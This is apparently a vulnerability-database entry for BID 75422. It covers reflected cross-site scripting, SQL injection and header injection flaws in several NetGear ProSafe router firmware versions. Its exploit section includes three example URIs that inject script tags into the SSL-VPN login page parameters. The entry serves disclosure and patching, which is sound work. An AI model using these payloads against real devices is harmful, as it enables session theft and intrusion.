ID
VAR-E-201506-0353
TITLE
Multiple NetGear ProSafe Routers Multiple Security Vulnerabilities
Trust: 0.3
DESCRIPTION
Multiple NetGear ProSafe routers are prone to multiple security vulnerabilities.
Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and to insert a crafted HTTP header into an HTTP response that could cause a web page redirection to a possible malicious website.
Trust: 0.3
AFFECTED PRODUCTS
| vendor: | netgear | model: | prosafe srx5308 | scope: | eq | version: | 4.3.3-3 | Trust: 0.3 |
| vendor: | netgear | model: | prosafe srx5308 | scope: | eq | version: | 4.3.2-7 | Trust: 0.3 |
| vendor: | netgear | model: | prosafe fvs336gv3 | scope: | eq | version: | 4.3.3-3 | Trust: 0.3 |
| vendor: | netgear | model: | prosafe fvs336gv3 | scope: | eq | version: | 4.3.2-7 | Trust: 0.3 |
| vendor: | netgear | model: | prosafe fvs336gv2 | scope: | eq | version: | 4.3.3-3 | Trust: 0.3 |
| vendor: | netgear | model: | prosafe fvs336gv2 | scope: | eq | version: | 4.3.2-7 | Trust: 0.3 |
| vendor: | netgear | model: | prosafe fvs318n | scope: | eq | version: | 4.3.3-3 | Trust: 0.3 |
| vendor: | netgear | model: | prosafe fvs318n | scope: | eq | version: | 4.3.2-7 | Trust: 0.3 |
| vendor: | netgear | model: | prosafe srx5308 | scope: | ne | version: | 4.3.3-5 | Trust: 0.3 |
| vendor: | netgear | model: | prosafe fvs336gv3 | scope: | ne | version: | 4.3.3-5 | Trust: 0.3 |
| vendor: | netgear | model: | prosafe fvs336gv2 | scope: | ne | version: | 4.3.3-5 | Trust: 0.3 |
| vendor: | netgear | model: | prosafe fvs318n | scope: | ne | version: | 4.3.3-5 | Trust: 0.3 |
EXPLOIT
Attackers can use a browser to exploit the SQL-injection issue. An attacker must trick a victim into following a malicious URI to exploit cross-site scripting issue.
The following example URIs are available:
https://www.example.com/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN";><script>alert("XSS")</script>
https://www.example.com/scgi-bin/platform.cgi?thispage=portalLogin.htm&Login.PortalName=SSL-VPN";><script>alert("XSS")<%2fscript>&USERDBUsers.UserName=test&USERDBUsers.Password=test&USERDBDomains.Domainname=geardomain&button.login.router_status=Login&Login.userAgent=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A31.0%29+Gecko%2F20100101+Firefox%2F31.0+Iceweasel%2F31.5.0
https://www.example.com/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN&stuMsg=Usereb<script>alert("XSS")<%2fscript>
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Input Validation Error
Trust: 0.3
CREDITS
Juan J. Güelfo of Encripto AS
Trust: 0.3
EXTERNAL IDS
| db: | BID | id: | 75422 | Trust: 0.3 |
REFERENCES
| url: | http://www.encripto.no/forskning/whitepapers/netgear_prosafe_advisory_june_2015.pdf | Trust: 0.3 |
| url: | http://www.netgear.com | Trust: 0.3 |
SOURCES
| db: | BID | id: | 75422 |
LAST UPDATE DATE
2022-07-27T09:58:40.240000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 75422 | date: | 2015-06-25T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 75422 | date: | 2015-06-25T00:00:00 |